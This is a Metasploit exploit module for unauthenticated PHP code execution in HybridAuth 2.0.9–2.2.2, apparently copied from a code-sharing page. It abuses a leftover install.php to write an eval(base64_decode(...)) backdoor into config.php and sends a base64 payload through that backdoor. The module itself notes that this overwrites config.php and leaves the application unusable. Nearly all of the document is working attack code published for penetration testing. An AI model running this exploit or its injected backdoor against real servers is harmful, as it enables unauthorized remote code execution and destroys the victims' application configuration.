扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 |
## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ManualRanking # application config.php is overwritten include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'HybridAuth install.php PHP Code Execution', 'Description'=> %q{ This module exploits a PHP code execution vulnerability in HybridAuth versions 2.0.9 to 2.2.2. The install file 'install.php' is not removed after installation allowing unauthenticated users to write PHP code to the application configuration file 'config.php'. Note: This exploit will overwrite the application configuration file rendering the application unusable. }, 'License'=> MSF_LICENSE, 'Author' => [ 'Pichaya Morimoto', # Discovery and PoC 'Brendan Coles <bcoles[at]gmail.com>' # Metasploit ], 'References' => [ ['EDB', '34273'], ['OSVDB','109838'] ], 'Arch' => ARCH_PHP, 'Platform' => 'php', 'Targets'=> [ # Tested: # HybridAuth versions 2.0.9, 2.0.10, 2.0.11, 2.1.2, 2.2.2 on Apache/2.2.14 (Ubuntu) ['HybridAuth version 2.0.9 to 2.2.2 (PHP Payload)', {}] ], 'Privileged' => false, 'DisclosureDate' => 'Aug 4 2014', 'DefaultTarget'=> 0)) register_options( [ OptString.new('TARGETURI', [true, 'The base path to HybridAuth library', '/hybridauth/']) ], self.class) end # # Check: # * install.php exists # * config.php is writable # * HybridAuth version is 2.0.9 to 2.0.11, 2.1.x, or 2.2.0 to 2.2.2 # def check res = send_request_cgi 'uri' => normalize_uri(target_uri.path, 'install.php') if !res vprint_error "#{peer} - Connection failed" return Exploit::CheckCode::Unknown elsif res.code == 404 vprint_error "#{peer} - Could not find install.php" elsif res.body =~ />([^<]+)<\/span> must be <b >WRITABLE</ vprint_error "#{peer} - #{$1} is not writable" elsif res.body =~ />HybridAuth (2\.[012]\.[\d\.]+(-dev)?) Installer</ version = res.body.scan(/>HybridAuth (2\.[012]\.[\d\.]+(-dev)?) Installer</).first.first vprint_status "#{peer} - Found version: #{version}" if version =~ /^2\.(0\.(9|10|11)|1\.[\d]+|2\.[012])/ return Exploit::CheckCode::Vulnerable else vprint_error "#{peer} - HybridAuth version #{version} is not vulnerable" end end Exploit::CheckCode::Safe end # # Exploit # def exploit # check vuln if check != Exploit::CheckCode::Vulnerable fail_with Exploit::Failure::NotVulnerable, "#{peer} - Target is not vulnerable" end # write backdoor print_status "#{peer} - Writing backdoor to config.php" payload_param = rand(1000) res = send_request_cgi( 'method' => 'POST', 'uri'=> normalize_uri(target_uri.path, 'install.php'), 'data' => "OPENID_ADAPTER_STATUS=eval(base64_decode($_POST[#{payload_param}])))));/*" ) if !res fail_with Failure::Unknown, "#{peer} - Connection failed" elsif res.body =~ /Installation completed/ print_good "#{peer} - Wrote backdoor successfully" else fail_with Failure::UnexpectedReply, "#{peer} - Coud not write backdoor to 'config.php'" end # execute payload code = Rex::Text.encode_base64(payload.encoded) print_status "#{peer} - Sending payload to config.php backdoor (#{code.length} bytes)" res = send_request_cgi({ 'method' => 'POST', 'uri'=> normalize_uri(target_uri.path, 'config.php'), 'data' => "#{payload_param}=#{code}" }, 5) if !res print_warning "#{peer} - No response" elsif res.code == 404 fail_with Failure::NotFound, "#{peer} - Could not find config.php" elsif res.code == 200 || res.code == 500 print_good "#{peer} - Sent payload successfully" end # remove backdoor print_status "#{peer} - Removing backdoor from config.php" res = send_request_cgi( 'method' => 'POST', 'uri'=> normalize_uri(target_uri.path, 'install.php'), 'data' => 'OPENID_ADAPTER_STATUS=' ) if !res print_error "#{peer} - Connection failed" elsif res.body =~ /Installation completed/ print_good "#{peer} - Removed backdoor successfully" else print_warning "#{peer} - Could not remove payload from config.php" end end end |
体验盒子
